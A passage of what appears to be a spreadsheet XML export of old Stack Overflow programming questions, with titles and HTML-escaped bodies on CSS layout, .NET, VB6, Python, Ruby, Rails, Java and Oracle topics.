&lt;p&gt;So, does anyone know if markers are &lt;em&gt;supposed&lt;/em&gt; to work? Quirksmode.org isn't being its usual helpful self in this regard :(.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Floats messing up in Safari browsers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a site I made really fast that uses floats to display different sections of content. The floated content and the content that has an additional margin both appear fine in FF/IE, but on safari one of the divs is completely hidden. I've tried switching to &lt;code&gt;padding&lt;/code&gt; and &lt;code&gt;position:relative&lt;/code&gt;, but nothing has worked for me. If I take out the code to display it to the right it shows up again but under the floated content.&lt;/p&gt;
&lt;p&gt;The main section of css that seems to be causing the problem is:&lt;/p&gt;
&lt;pre class="lang-css prettyprint-override"&gt;&lt;code&gt;#settings{
    float:left;
}
#right_content{
    margin-top:20px;
    margin-left:440px;
    width:400px;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This gives me the same result whether I specify a size to the #settings div or not. Any ideas would be appreciated.&lt;/p&gt;
&lt;p&gt;The site is available at: &lt;a href="http://frickinsweet.com/tools/Theme.mvc.aspx" rel="nofollow"&gt;http://frickinsweet.com/tools/Theme.mvc.aspx&lt;/a&gt; to see the source code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why the option to use attributes in new ATL projects was removed from Visual Studio 2008?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is the text from MSDN comment: "According to the book ATL Internals (2ed) the use of attributes is deprecated and should not be used in new ATL projects."&lt;/p&gt;
&lt;p&gt;But WHY?!! &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Override ScriptControl or BaseValidator for an async ASP.NET validator control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm planning to develop an ASP.NET server control to provide asynchronous username availability validation for new user registrations.  The control will allow a developer to point it at a "username" TextBox and it will provide an indication of whether or not the username is available.  Like &lt;a href="http://encosia.com/2007/07/02/aspnet-username-availability-checking-via-ajax/" rel="nofollow"&gt;this example&lt;/a&gt;, but without the clunky UpdatePanel.&lt;/p&gt;
&lt;p&gt;One design decision that's giving me headaches is whether to inherit from &lt;strong&gt;ScriptControl&lt;/strong&gt; or &lt;strong&gt;BaseValidator&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;By implementing it as a &lt;strong&gt;ScriptControl&lt;/strong&gt;, I can make the client side portion easier to deal with and easily localize it with a resx.&lt;/p&gt;
&lt;p&gt;However, I want to make sure that the validator functions properly with respect to Page.IsValid.  The only way I know to do this is to override &lt;strong&gt;BaseValidator&lt;/strong&gt; and implement &lt;code&gt;EvaluateIsValid()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;So, my question is, how would you suggest structuring this control?  Is inheriting from BaseValidator the best (only) way to get the validator part right, or can I do that in some other way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS - Placement of a div in the lower left-hand corner</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wish I were a CSS smarty .... &lt;/p&gt;
&lt;p&gt;How can you place a div container in the lower left-hand corner of the web page; taking into account the users scroll-position?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to iterate a jagged array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This has been driving me crazy for a few days.  Why doesn't the following work?&lt;/p&gt;
&lt;blockquote&gt;
&lt;pre&gt;&lt;code&gt;    Dim arr(3, 3) As Integer
    For y As Integer = 0 To arr.GetLength(0) - 1
        For x As Integer = 0 To arr.GetLength(y) - 1
            arr(y, x) = y + x
        Next
    Next
&lt;/code&gt;&lt;/pre&gt;
&lt;/blockquote&gt;
&lt;p&gt;Also, what if the array looked like this instead?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{ {1, 2, 3},
  {4, 5, 6, 7, 8, 9, 9, 9},
  {5, 4, 3, 2}
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Can I prevent user pasting Javascript into Design Mode IFrame?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a webapp that contains an IFrame in design mode so my user's can "tart" their content up and paste in content to be displayed on their page.  Like the WYSIWYG editor on most blog engines or forums.&lt;/p&gt;
&lt;p&gt;I'm trying to think of all potential security holes I need to plug, one of which is a user pasting in Javascript:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type="text/javascript"&amp;gt;
// Do some nasty stuff
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I know I can strip this out at the server end, before saving it and/or serving it back, but I'm worried about the possibility of someone being able to paste some script in and run it there and then, without even sending it back to the server for processing.&lt;/p&gt;
&lt;p&gt;Am I worrying over nothing?&lt;/p&gt;
&lt;p&gt;Any advice would be great, couldn't find much searching Google.&lt;/p&gt;
&lt;p&gt;Anthony&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to convince a project sponsor that all functions in your code should have unit tests</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Non technical people in most cases do not see any value in writing unit tests. They just want to have basic code completed and do not spend money and time on such things like unit tests. Later, every day they just to ask to fix a one bug more. Projects are missing deadlines and they still don't see value in good automated tests.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Average User Download Speeds</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Any ideas what the average user's download speed is? I'm working on a site that streams video and am trying to figure out what an average download speed as to determine quality.&lt;/p&gt;
&lt;p&gt;I know i might be comparing apples with oranges but I'm just looking for something to get a basis for where to start.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to detect a release build from a debug build? .net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I have about 10 short css files that I use with mvc app.
There are like
error.css
login.css
etc...
Just some really short css files that make updating and editing easy (At least for me). What I want is something that will optimize the if else branch and not incorporate it within the final bits. I want to do something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if(Debug.Mode){
&amp;lt;link rel="stylesheet" type="text/css" href="error.css" /&amp;gt; 
&amp;lt;link rel="stylesheet" type="text/css" href="login.css" /&amp;gt; 
&amp;lt;link rel="stylesheet" type="text/css" href="menu.css" /&amp;gt; 
&amp;lt;link rel="stylesheet" type="text/css" href="page.css" /&amp;gt; 
} else {
&amp;lt;link rel="stylesheet" type="text/css" href="site.css" /&amp;gt; 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'll have a msbuild task that will combine all the css files, minimize them and all that good stuff. I just need to know if there is a way to remove the if else branch in the final bits.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the simplest way to find the difference between 2 times in python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 2 time values which have the type &lt;code&gt;datetime.time&lt;/code&gt;. I want to find their difference. The obvious thing to do is t1 - t2, but this doesn't work. It works for objects of type &lt;code&gt;datetime.datetime&lt;/code&gt; but not for &lt;code&gt;datetime.time&lt;/code&gt;. So what is the best way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some good usability guidelines an average developer should follow?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm not a usability specialist, and I really don't care to be one.&lt;/p&gt;
&lt;p&gt;I just want a small set of rules of thumb that I can follow while coding my User Interfaces so that my product has decent usability.&lt;/p&gt;
&lt;p&gt;At first I thought that this question would be easy to answer "Use your common sense", but if it's so common among us developers we wouldn't, as a group, have a reputation for our horrible interfaces.&lt;/p&gt;
&lt;p&gt;Any Suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get MIME type of a local file in PHP5 without a PECL extension?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;code&gt;mime_content_type()&lt;/code&gt; is deprecated.&lt;/p&gt;
&lt;p&gt;How can I find the &lt;code&gt;MIME type of a local file&lt;/code&gt; using &lt;code&gt;PHP5&lt;/code&gt; but without using this deprecated method or the &lt;code&gt;PECL fileinfo extension?&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Edit: That's what I was afraid of.  It's unfortunate that they deprecated a built-in function in favour of one that requires an extension that isn't always available.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How many real world developers are involved with the Demoscene?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I grew up learning to code based on what I've experienced with the &lt;a href="http://en.wikipedia.org/wiki/Demoscene"&gt;demoscene&lt;/a&gt;.  It seems to be a pretty sparse subculture in the US.  How many developers watch or participate in the scene?&lt;/p&gt;
&lt;p&gt;Teaser: If you haven't checked out the scene before, take a look at one of my favorites: &lt;a href="http://www.pouet.net/prod.php?which=30244"&gt;Debris&lt;/a&gt; by Farbrausch.  Watch on &lt;a href="http://demoscene.tv/page.php?id=172&amp;amp;lang=uk&amp;amp;vsmaction=view_prod&amp;amp;id_prod=12909"&gt;demoscene.tv&lt;/a&gt; or download the &lt;a href="http://www.scene.org/file.php?file=/parties/2007/breakpoint07/demo/fr-041_debris.zip&amp;amp;fileinfo"&gt;app&lt;/a&gt; (179k) and run it yourself.  No video, all realtime rendering and audio.  Think, a small group of guys wrote this for a competition on their free time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does clicking a child window not always bring the application to the foreground?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When an application is behind another applications and
I click on my application's taskbar icon, I expect the entire application to
come to the top of the z-order, even if an app-modal, WS_POPUP dialog box is
open.&lt;/p&gt;
&lt;p&gt;However, some of the time, for some of my (and others') dialog boxes, only the dialog box comes to the front; the rest of the application stays behind.&lt;/p&gt;
&lt;p&gt;I've looked at Spy++ and for the ones that work correctly, I can see
WM_WINDOWPOSCHANGING being sent to the dialog's parent. For the ones that
leave the rest of the application behind, WM_WINDOWPOSCHANGING is not being
sent to the dialog's parent.&lt;/p&gt;
&lt;p&gt;I have an example where one dialog usually brings the whole app with it and the other does not. Both the working dialog box and the non-working dialog box have the same window style, substyle, parent, owner, ontogeny.&lt;/p&gt;
&lt;p&gt;In short, both are WS_POPUPWINDOW windows created with DialogBoxParam(),
having passed in identical HWNDs as the third argument.&lt;/p&gt;
&lt;p&gt;Has anyone else noticed this behavioral oddity in Windows programs? What messages does the TaskBar send to the application when I click its button? Who's responsibility is it to ensure that &lt;em&gt;all&lt;/em&gt; of the application's windows come to the foreground?&lt;/p&gt;
&lt;p&gt;In my case the base parentage is an MDI frame...does that factor in somehow?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I stop Visual Studio from automatically inserting asterisk during a block comment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm tearing my hair out with this one. If I start a block comment &lt;code&gt;/*&lt;/code&gt; in VS.NET 2005+ then carriage return, Visual Studio insists that I have another asterisk &lt;code&gt;*&lt;/code&gt;. I know there's an option to turn this off but I just can't find it. Anyone know how to turn this feature off?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to deal with RoutingError in Rails 2.1.x?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm playing with the routing.rb code in Rails 2.1, and trying to to get it to the point where I can do something useful with the RoutingError exception that is thrown when it can't find the appropriate path.&lt;/p&gt;
&lt;p&gt;This is a somewhat tricky problem, because there are some class of URLs which are just plain BAD: the /azenv.php bot attacks, the people typing /bar/foo/baz into the URL, etc... we don't want that.&lt;/p&gt;
&lt;p&gt;Then there's subtle routing problems, where we do want to be notified:  /artists/ for example, or ///.  In these situations, we may want an error being thrown, or not... or we get Google sending us URLs which used to be valid but are no longer because people deleted them.&lt;/p&gt;
&lt;p&gt;In each of these situations, I want a way to contain, analyze and filter the path that we get back, or at least some Railsy way to manage routing past the normal 'fallback catchall' url.  Does this exist?&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;So the code here is: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# File vendor/rails/actionpack/lib/action_controller/rescue.rb, line 141
def rescue_action_without_handler(exception)
 log_error(exception) if logger
 erase_results if performed?
 # Let the exception alter the response if it wants.
 # For example, MethodNotAllowed sets the Allow header.
 if exception.respond_to?(:handle_response!)
   exception.handle_response!(response)
 end
 if consider_all_requests_local || local_request?
   rescue_action_locally(exception)
 else
  rescue_action_in_public(exception)
 end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So our best option is to override log_error(exception) so that we can filter down the exceptions according to the exception.  So in ApplicationController&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def log_error(exception)
    message = '...'
    if should_log_exception_as_debug?(exception)
      logger.debug(message)
    else
      logger.error(message)
    end
end
def should_log_exception_as_debug?(exception)
   return (ActionController::RoutingError === exception)
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Salt for additional logic where we want different controller logic, routes, etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find all drive letters in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For a project I'm working on. I need to look for an executable on the filesystem. For UNIX derivatives, I assume the user has the file in the mighty $PATH variable, but there is no such thing on Windows.&lt;/p&gt;
&lt;p&gt;I can safely assume the file is at most 2 levels deep into the filesystem, but I don't know on what drive it will be. I have to try all drives, but I can't figure out how to list all available drives (which have a letter assigned to it).&lt;/p&gt;
&lt;p&gt;Any help?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; I know there is a %PATH% variable, but it is not as integrated as in UNIX systems. For instance, the application I'm looking for is OpenOffice. Such software would not be in %PATH%, typically.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When can DataInputStream.skipBytes(n) not skip n bytes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The &lt;a href="http://java.sun.com/j2se/1.4.2/docs/api/java/io/DataInput.html#skipBytes%28int%29" rel="nofollow"&gt;Sun Documentation for DataInput.skipBytes&lt;/a&gt; states that it "makes an attempt to skip over n bytes of data from the input stream, discarding the skipped bytes. However, it may skip over some smaller number of bytes, possibly zero. This may result from any of a number of conditions; reaching end of file before n bytes have been skipped is only one possibility."&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Other than reaching end of file, why might &lt;code&gt;skipBytes()&lt;/code&gt; not skip the right number of bytes? (The &lt;code&gt;DataInputStream&lt;/code&gt; I am using will either be wrapping a &lt;code&gt;FileInputStream&lt;/code&gt; or a &lt;code&gt;PipedInputStream&lt;/code&gt;.)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If I definitely want to skip n bytes and throw an &lt;code&gt;EOFException&lt;/code&gt; if this causes me to go to the end of the file, should I use &lt;code&gt;readFully()&lt;/code&gt; and ignore the resulting byte array? Or is there a better way?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Where did all the java applets go?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When java was young, people were excited about writing applets.  They were cool and popular, for a little while.  Now, I never see them anymore.  Instead we have flash, javascript, and a plethora of other web app-building technologies.&lt;/p&gt;
&lt;p&gt;Why don't sites use java applets anymore?&lt;/p&gt;
&lt;p&gt;I'm also curious: historically, why do you think this occurred?  What could have been done differently to keep Java applets alive?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the base 10 logarithm of a Fixnum in Ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to get the base 10 logarithm of a Fixnum using Ruby, but found that n.log or n.log10 are not defined. Math::log is defined but uses a different base than 10.&lt;/p&gt;
&lt;p&gt;What is the easiest way to get the base 10 logarithm of a Fixnum?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I reset a sequence in Oracle?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In &lt;a href="http://en.wikipedia.org/wiki/PostgreSQL"&gt;PostgreSQL&lt;/a&gt;, I can do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ALTER SEQUENCE serial RESTART WITH 0;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there an Oracle equivalent?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bad Smells When Reviewing Code Affects Approach?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;G'day,&lt;/p&gt;
&lt;p&gt;I was thinking about a comment from &lt;a href="http://stackoverflow.com/users/1175/kristopher-johnson" rel="nofollow"&gt;Kristopher Johnson&lt;/a&gt; about my answer to this &lt;a href="http://stackoverflow.com/questions/50612/software-development-quality" rel="nofollow"&gt;question&lt;/a&gt; regarding Software Development Quality.&lt;/p&gt;
&lt;p&gt;I'd posted a list of software quality metrics that I could think of off the top of my head that included:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;McCabe Cyclometric Complexity - basically a measure of the number of linear paths through code.&lt;/li&gt;
&lt;li&gt;Levels of indentation - a measure of complexity when looking at nested decision statements.&lt;/li&gt;
&lt;li&gt;Distance from declaration to first use - how many statements exist between where a variable is declared and where it is first used.&lt;/li&gt;
&lt;li&gt;Comment percentage - how many lines of code are comments compared to source code.&lt;/li&gt;
&lt;li&gt;Percent test coverage - as a percentage of lines of code, how many are exercised by your suite of tests.&lt;/li&gt;
&lt;li&gt;Path test coverage - how many paths of execution are exercised by your tests.&lt;/li&gt;
&lt;li&gt;Unit coverage - how many individual units, classes, packages, etc., are exercised by your unit tests.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Kris's comment was:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Only the test-coverage metrics listed here could be considered a measure of "quality." The others are measurements of complexity and readability, which really has nothing to do with quality.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Apart from the fact that I don't agree with this statement at all, it got me thinking.&lt;/p&gt;
&lt;p&gt;When I have to review code that has hardly any associated tests, whether unit, system or integration, I tend to approach the code much, much more warily than if I see a good suite of tests that have been successfully passed.&lt;/p&gt;
&lt;p&gt;Same thing when performing security audits on code. If I see unused variables, huge functions, bizarre mixtures of configs, per server, per dir, etc. being used in Apache modules it also predisposes me to approach the code very warily.&lt;/p&gt;
&lt;p&gt;Does anyone else use this initial "gut feeling" approach and does it affect the outcome?&lt;/p&gt;
&lt;p&gt;BTW I don't agree with Kris's comment because all the other metrics are definitely valid measures that will help highlight badly designed, poorly executed code. As Damian Conway says:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>How to get an absolute file path in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a path such as &lt;code&gt;"mydir/myfile.txt"&lt;/code&gt;, how do I find the absolute filepath relative to the current working directory in Python? E.g. on Windows, I might end up with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"C:/example/cwd/mydir/myfile.txt"
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do you treat legacy code (and data)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently in the process of restructuring my local Subversion repository by adding some new projects and merging legacy code and data from a couple of older repositories into it. &lt;/p&gt;
&lt;p&gt;When I have done this in the past I have usually put the legacy code in a dedicated "legacy" folder, as not to "disturb" the new and "well-structured" code tree. However, in the spirit of refactoring I feel this is somewhat wrong. In theory, the legacy code will be refactored over time and moved to its new location, but in practice this rarely happens.&lt;/p&gt;
&lt;p&gt;How do you treat your legacy code? As much as I feel tempted to tuck away old sins in the "legacy" folder, never to look at it again, on some level I hope that by forcing it to live among the more "healthy" inhabitants in the repository, maybe the legacy code will have a better chance of getting well some day?&lt;/p&gt;
&lt;p&gt;(Yeah, we all know &lt;a href="http://www.joelonsoftware.com/articles/fog0000000069.html" rel="nofollow"&gt;we shouldn't rewrite stuff&lt;/a&gt;, but this is my "fun" repository, not my business projects...)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I am not worried about the technical aspects of keeping track of various versions. I know how to use tags and branches for that. This is more of a psychological aspect, as I prefer to have a "neat" structure in the repository, which makes navigating it much easier&amp;mdash;for humans.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Determine how much memory a class uses?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to find a way to determine at run-time how much memory a given class is using in .NET.  Using Marshal.SizeOf() is out, as it only works on value types.  Is there a way to check exactly how much memory a class uses?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Metamodelling tools</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tools are available for metamodelling? &lt;/p&gt;
&lt;p&gt;Especially for developing diagram editors, at the moment trying out &lt;a href="http://www.eclipse.org/modeling/gmf/" rel="nofollow"&gt;Eclipse GMF&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Wondering what other options are out there? 
Any comparison available?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Graph (Chart) Algorithm</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have a decent algorithm for calculating axis minima and maxima? &lt;/p&gt;
&lt;p&gt;When creating a chart for a given set of data items, I'd like to be able to give the algorithm: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the maximum (y) value in the set &lt;/li&gt;
&lt;li&gt;the minimum (y) value in the set &lt;/li&gt;
&lt;li&gt;the number of tick marks to appear on the axis &lt;/li&gt;
&lt;li&gt;an optional value that &lt;strong&gt;must&lt;/strong&gt; appear as a tick (e.g. zero when showing +ve and -ve values)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The algorithm should return&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the largest axis value &lt;/li&gt;
&lt;li&gt;the smallest axis value (although that could be inferred from the largest, the interval size and the number of ticks)&lt;/li&gt;
&lt;li&gt;the interval size &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The ticks should be at a regular interval should be of a "reasonable" size (e.g. 1, 3, 5, possibly even 2.5, but not any more sig figs). &lt;/p&gt;
&lt;p&gt;The presence of the optional value will skew this, but without that value the largest item should appear between the top two tick marks, the lowest value between the bottom two. &lt;/p&gt;
&lt;p&gt;This is a language-agnostic question, but if there's a C#/.NET library around, that would be smashing ;) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vista BEX error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently I got IE7 crashed on Vista on jar loading (presumably) with the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Problem signature:
  Problem Event Name:        BEX
  Application Name:          iexplore.exe
  Application Version:       7.0.6001.18000
  Application Timestamp:     47918f11
  Fault Module Name:         ntdll.dll
  Fault Module Version:      6.0.6001.18000
  Fault Module Timestamp:    4791a7a6
  Exception Offset:          00087ba6
  Exception Code:            c000000d
  Exception Data:            00000000
  OS Version:                6.0.6001.2.1.0.768.3
  Locale ID:                 1037
  Additional Information 1:  fd00
  Additional Information 2:  ea6f5fe8924aaa756324d57f87834160
  Additional Information 3:  fd00
  Additional Information 4:  ea6f5fe8924aaa756324d57f87834160
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Googling revealed this sort of problems &lt;a href="http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=1194672&amp;amp;SiteID=1"&gt;is&lt;/a&gt; &lt;a href="http://support.mozilla.com/tiki-view_forum_thread.php?locale=eu&amp;amp;comments_parentId=101420&amp;amp;forumId=1"&gt;common&lt;/a&gt; &lt;a href="http://www.eggheadcafe.com/software/aspnet/29930817/bex-problem.aspx"&gt;for&lt;/a&gt; &lt;a href="http://www.microsoft.com/communities/newsgroups/en-us/default.aspx?dg=microsoft.public.vc.mfc&amp;amp;tid=d511c635-3c99-431d-8118-526d3e3fff00&amp;amp;cat=&amp;amp;lang=&amp;amp;cr=&amp;amp;sloc=&amp;amp;p=1"&gt;Vista&lt;/a&gt; and relates to &lt;a href="http://www.gomanuals.com/java_not_working_on_windows_vista.shtml"&gt;Java&lt;/a&gt; (although SUN &lt;a href="http://weblogs.java.net/blog/chet/archive/2006/10/java_on_vista_y.html"&gt;negates&lt;/a&gt;). Also I think it has something to do with DEP. I failed to find official Microsoft Kb.&lt;/p&gt;
&lt;p&gt;So, the questions are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What BEX stands for?&lt;/li&gt;
&lt;li&gt;What is it about?&lt;/li&gt;
&lt;li&gt;How to deal with such kind of errors?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Property default values using Properties.Settings.Default</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using .Net 2 and the normal way to store my settings. I store my custom object serialized to xml. I am trying to retrieve the default value of the property (but without reseting other properties). I use:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ValuationInput valuationInput = (ValuationInput) Settings.Default.Properties["ValuationInput"].DefaultValue;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it seems to return a string instead of ValuationInput and it throws an exception. &lt;/p&gt;
&lt;p&gt;I made a quick hack, which works fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string valuationInputStr = (string) 
Settings.Default.Properties["ValuationInput"].DefaultValue;
            XmlSerializer xmlSerializer = new XmlSerializer(typeof(ValuationInput));
            ValuationInput valuationInput = (ValuationInput) xmlSerializer.Deserialize(new StringReader(valuationInputStr));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this is really ugly - when I use all the tool to define a strongly typed setting, I don't want to serialize the default value myself, I would like to read it the same way as I read the current value: ValuationInput valuationInput = Settings.Default.ValuationInput;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to force my ASP.net 2.0 app to recompile</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a ASP.net 2.0 app and I have made some changes the the source file ( cs files ). I uploaded the changes with the belief that it would auto-recompile. I also have the compiled dll in MY_APP/bin. I checked it and noticed that it did not recompile. Please understand I am new to this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I allow assembly (unit testing one) to access internal properties of another assembly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like my Core assembly to not expose a certain class and I would still like to be able to test it. How can I do that ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I build a loop in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I build a loop in JavaScript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the (technical) pros and cons of Flash vs AJAX/JS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We provide a web application with a frontend completely developed in Adobe Flash. When we chose Flash 6 years ago, we did so for its large number of features for user interaction, like dragging stuff, opening and closing menus, tree navigation elements, popup dialogs etc.&lt;/p&gt;
&lt;p&gt;Today it's obvious that AJAX/JS offers roughly the same possibilities and because of the number of frameworks that are readily available, it's very feasible to implement them.&lt;/p&gt;
&lt;p&gt;Is there a technical reason one should choose either technology over the other? By "technical", I mean performance, security, portability/compatibility and the like. I don't mean aspects such as the very non-programmer way development is done in Flash or whether it makes sense to switch an app from one to the other.&lt;/p&gt;
&lt;p&gt;As I just explained &lt;a href="http://stackoverflow.com/questions/52094/which-ria-technology-has-the-biggest-market-share" rel="nofollow"&gt;in another question&lt;/a&gt;, it seems to me that JS is way ahead in terms of market share and I'm wondering whether we are missing some important point if we stick to Flash.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VB6 Runtime Type Retrival</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can you obtain the Type (the name as a string is sufficient) of an Object in VB6 at runtime?&lt;/p&gt;
&lt;p&gt;i.e. something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;If Typeof(foobar) = "CommandButton" Then ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;/EDIT:&lt;/strong&gt; to clarify, I need to check on Dynamically Typed objects. An example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim y As Object 
Set y = CreateObject("SomeType")
Debug.Print( &amp;lt;The type name of&amp;gt; y)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where the output would be "CommandButton"&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Templates of Technical and Functional Specs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So basically I am looking for good templates for writing both technical and functional specs on a project or work request.&lt;/p&gt;
&lt;p&gt;What do you use? How deep do you get while writing the specs? Any additional general tips you could provide would be appreciated.&lt;/p&gt;
&lt;p&gt;My company needs these badly. I work for a contractor and right now we do not use these documents at all. &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; I have read Joel's take about &lt;a href="http://www.joelonsoftware.com/articles/fog0000000036.html"&gt;Painless Specification&lt;/a&gt;, I really liked it, but are there any other opinions :) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can you determine what version(s) of .NET are running on a system?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the different ways (programmatically and otherwise) to determine what versions of .NET are running on a system?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Patterns for the overlap of two objects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm sure this has already been asked and answered so I apologize in advance for that but I'm not figuring out the correct keywords to search for.  Searching for "Pattern" hits way too many Q &amp;amp; A's to be useful.&lt;/p&gt;
